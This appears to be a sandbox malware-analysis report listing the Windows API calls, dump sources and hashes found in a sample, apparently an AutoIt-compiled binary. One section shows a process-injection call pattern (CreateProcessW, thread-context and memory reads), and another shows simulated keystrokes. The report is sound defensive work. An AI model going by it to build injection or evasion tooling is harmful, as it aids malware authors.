                                                                              • Part of subcall function 0032395C: RtlAllocateHeap.NTDLL(00D00000,00000000,00000001,00000001,00000000,?,?,0031F507,?,0000000E), ref: 0032399F
                                                                            • std::exception::exception.LIBCMT ref: 0031F51E
                                                                            • __CxxThrowException@8.LIBCMT ref: 0031F533
                                                                              • Part of subcall function 00326805: RaiseException.KERNEL32(?,?,0000000E,003B6A30,?,?,?,0031F538,0000000E,003B6A30,?,00000001), ref: 00326856
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 3902256705-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __lock_file_memset
                                                                            • String ID:
                                                                            • API String ID: 26237723-0
                                                                            APIs
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            • __lock_file.LIBCMT ref: 00323629
                                                                              • Part of subcall function 00324E1C: __lock.LIBCMT ref: 00324E3F
                                                                            • __fclose_nolock.LIBCMT ref: 00323634
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2800547568-0
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00D4636D
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D46391
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D463B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            APIs
                                                                            • __flush.LIBCMT ref: 00322A0B
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __flush__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 4101623367-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 3074181302-0
                                                                            APIs
                                                                              • Part of subcall function 00304214: FreeLibrary.KERNEL32(00000000,?), ref: 00304247
                                                                            • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003039FE,?,00000001), ref: 003041DB
                                                                              • Part of subcall function 00304291: FreeLibrary.KERNEL32(00000000), ref: 003042C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Free$Load
                                                                            • String ID:
                                                                            • API String ID: 2391024519-0
                                                                            • Opcode ID: 3220e553cf66af1cbc982fd358bb2d061923d87bc77716ac0b3839c2bc793496
                                                                            • Instruction ID: d0b17bed008f9e78f73065cf43405618dabcfe81ffbfdd0815a54f64c96030cf
                                                                            • Opcode Fuzzy Hash: 3220e553cf66af1cbc982fd358bb2d061923d87bc77716ac0b3839c2bc793496
                                                                            • Instruction Fuzzy Hash: BB11C1B1701306ABCB12BB64DC26F9E77AD9F40700F108829F696AE0C2DB74DB149B60
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 14461c417fe19c37f7a94e712900a7f3cdbc70e2f01b6c1ff8ca905f70a37ea9
                                                                            • Instruction ID: 0d44a027a81c746dd01cf222130dbcc96dd606c276a13403e73ba74bc1df1b5c
                                                                            • Opcode Fuzzy Hash: 14461c417fe19c37f7a94e712900a7f3cdbc70e2f01b6c1ff8ca905f70a37ea9
                                                                            • Instruction Fuzzy Hash: 6E216970508701CFDB2ADF64C444B5ABBE1BF89304F15896CF59A4B662C771E885CF52
                                                                            APIs
                                                                            • ___lock_fhandle.LIBCMT ref: 0032AFC0
                                                                              • Part of subcall function 00327BDA: __getptd_noexit.LIBCMT ref: 00327BDA
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit$___lock_fhandle
                                                                            • String ID:
                                                                            • API String ID: 1144279405-0
                                                                            • Opcode ID: f2290af03fd204319d53135fab66a9b93b22fdfe93bc8363d154aaf6621e2ce9
                                                                            • Instruction ID: 094e78df11762d147444803b75567966b65e3446639034add3ea7e862b7fec92
                                                                            • Opcode Fuzzy Hash: f2290af03fd204319d53135fab66a9b93b22fdfe93bc8363d154aaf6621e2ce9
                                                                            • Instruction Fuzzy Hash: D01191728156709FD7137FA4F94275DBB60AF42331F168640E4745F1E2D7B89D008BA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                            • Instruction ID: db7b3857b405f9d60d916561ea40dd94bfdd2d5d189084b4d5818265e14c104e
                                                                            • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                            • Instruction Fuzzy Hash: F3013671501109EECF06EF64C8918FEBB78AF20344F108065B5559B1D5EA309B49DF60
                                                                            APIs
                                                                            • __lock_file.LIBCMT ref: 00322AED
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2597487223-0
                                                                            • Opcode ID: 376b21b7818301a32a4f0c45003420713ed0fc575a34da18741ec4f2e68bf215
                                                                            • Instruction ID: 7459747bb4a030b202f646bd768f0e5621be1451f68b455aa9ccae03e705a61e
                                                                            • Opcode Fuzzy Hash: 376b21b7818301a32a4f0c45003420713ed0fc575a34da18741ec4f2e68bf215
                                                                            • Instruction Fuzzy Hash: CEF0CD31900225BADF23AF79AC033DF3AA5BF00320F168425F4149E192CB788A62DB81
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,003039FE,?,00000001), ref: 00304286
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 059425e56187bf92a724d89d8edc00f7c24dd5d806d7ffb6078f46ae7545bf74
                                                                            • Instruction ID: ac3972403a4e9245d761b2cc0c5b7402c24c1903be302e855fcff7ba154e57c0
                                                                            • Opcode Fuzzy Hash: 059425e56187bf92a724d89d8edc00f7c24dd5d806d7ffb6078f46ae7545bf74
                                                                            • Instruction Fuzzy Hash: E9F030B1606711CFCB369F64D4A4816B7F8BF043253258E7EF2D682550C7319A40DF50
                                                                            APIs
                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003040C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: LongNamePath
                                                                            • String ID:
                                                                            • API String ID: 82841172-0
                                                                            • Opcode ID: 8bfb6c86dbd24ad30f781d6705b73329f62b1235926586e811f87e5bde96ae6c
                                                                            • Instruction ID: 24b3cecbba610cc0da4a0ad1981f10d0684ee92ce8038f0b2c8a5d6bf0e1d105
                                                                            • Opcode Fuzzy Hash: 8bfb6c86dbd24ad30f781d6705b73329f62b1235926586e811f87e5bde96ae6c
                                                                            • Instruction Fuzzy Hash: 66E0CD766002245BC712A654DC46FEA77ADDF8C7A0F0501B5F905DB244D96499818790
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock
                                                                            • String ID:
                                                                            • API String ID: 2638373210-0
                                                                            • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                            • Instruction ID: b7b5fe81a8c924a71de395dd58a830d54c017f6bf0fd8b4ff0eed177e54660b6
                                                                            • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                            • Instruction Fuzzy Hash: 50E092B1504B009BD7398E24D800BE3B3E0EB06309F00085CF2DA87241EBA2B8418659
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 00D46B51
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction ID: 1dbefdbf9fb5851a9c95cb7153f185ed4a44842281cfaae10248789e81ce6158
                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction Fuzzy Hash: 83E0BF7494010D9FDB00EFA8D54969E7BB4EF04301F100161FD02D2280D63199508A62
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0036F87D
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0036F8DC
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0036F919
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0036F940
                                                                            • SendMessageW.USER32 ref: 0036F966
                                                                            • _wcsncpy.LIBCMT ref: 0036F9D2
                                                                            • GetKeyState.USER32(00000011), ref: 0036F9F3
                                                                            • GetKeyState.USER32(00000009), ref: 0036FA00
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0036FA16
                                                                            • GetKeyState.USER32(00000010), ref: 0036FA20
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0036FA4F
                                                                            • SendMessageW.USER32 ref: 0036FA72
                                                                            • SendMessageW.USER32(?,00001030,?,0036E059), ref: 0036FB6F
                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0036FB85
                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0036FB96
                                                                            • SetCapture.USER32(?), ref: 0036FB9F
                                                                            • ClientToScreen.USER32(?,?), ref: 0036FC03
                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0036FC0F
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0036FC29
                                                                            • ReleaseCapture.USER32 ref: 0036FC34
                                                                            • GetCursorPos.USER32(?), ref: 0036FC69
                                                                            • ScreenToClient.USER32(?,?), ref: 0036FC76
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0036FCD8
                                                                            • SendMessageW.USER32 ref: 0036FD02
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0036FD41
                                                                            • SendMessageW.USER32 ref: 0036FD6C
                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0036FD84
                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0036FD8F
                                                                            • GetCursorPos.USER32(?), ref: 0036FDB0
                                                                            • ScreenToClient.USER32(?,?), ref: 0036FDBD
                                                                            • GetParent.USER32(?), ref: 0036FDD9
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0036FE3F
                                                                            • SendMessageW.USER32 ref: 0036FE6F
                                                                            • ClientToScreen.USER32(?,?), ref: 0036FEC5
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0036FEF1
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0036FF19
                                                                            • SendMessageW.USER32 ref: 0036FF3C
                                                                            • ClientToScreen.USER32(?,?), ref: 0036FF86
                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0036FFB6
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0037004B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                            • String ID: @GUI_DRAGID$F
                                                                            • API String ID: 2516578528-4164748364
                                                                            • Opcode ID: 5812abd1c44a35519b8e7301fba5f520e9dba091b6d39ab5cb864f3a2d70ee7d
                                                                            • Instruction ID: 0471f48478731ae0d78a6478fa10ed614ab8674cbd053825761d518a96e2ab2b
                                                                            • Opcode Fuzzy Hash: 5812abd1c44a35519b8e7301fba5f520e9dba091b6d39ab5cb864f3a2d70ee7d
                                                                            • Instruction Fuzzy Hash: 7032EC74604344EFDB22CF64D884FAABBA8FF49354F0486A9FA95872A5D731EC10CB51
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0036B1CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: %d/%02d/%02d
                                                                            • API String ID: 3850602802-328681919
                                                                            • Opcode ID: ac9df29060358bfdf559885d52a08f2265182055c068c36bccc2147431ca096f
                                                                            • Instruction ID: c542db83bf5e9085eab173579c50d1e91c5d3193f8f67647d2c2837d16a384ad
                                                                            • Opcode Fuzzy Hash: ac9df29060358bfdf559885d52a08f2265182055c068c36bccc2147431ca096f
                                                                            • Instruction Fuzzy Hash: FE12DE71500208ABEB269F64CC59FAEBBB8FF46710F108259F91AEB2D5DB748941CF11
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(00000000,00000000), ref: 0031EB4A
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00373AEA
                                                                            • IsIconic.USER32(000000FF), ref: 00373AF3
                                                                            • ShowWindow.USER32(000000FF,00000009), ref: 00373B00
                                                                            • SetForegroundWindow.USER32(000000FF), ref: 00373B0A
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00373B20
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00373B27
                                                                            • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00373B33
                                                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00373B44
                                                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00373B4C
                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00373B54
                                                                            • SetForegroundWindow.USER32(000000FF), ref: 00373B57
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00373B6C
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00373B77
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00373B81
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00373B86
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00373B8F
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00373B94
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00373B9E
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00373BA3
                                                                            • SetForegroundWindow.USER32(000000FF), ref: 00373BA6
                                                                            • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00373BCD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
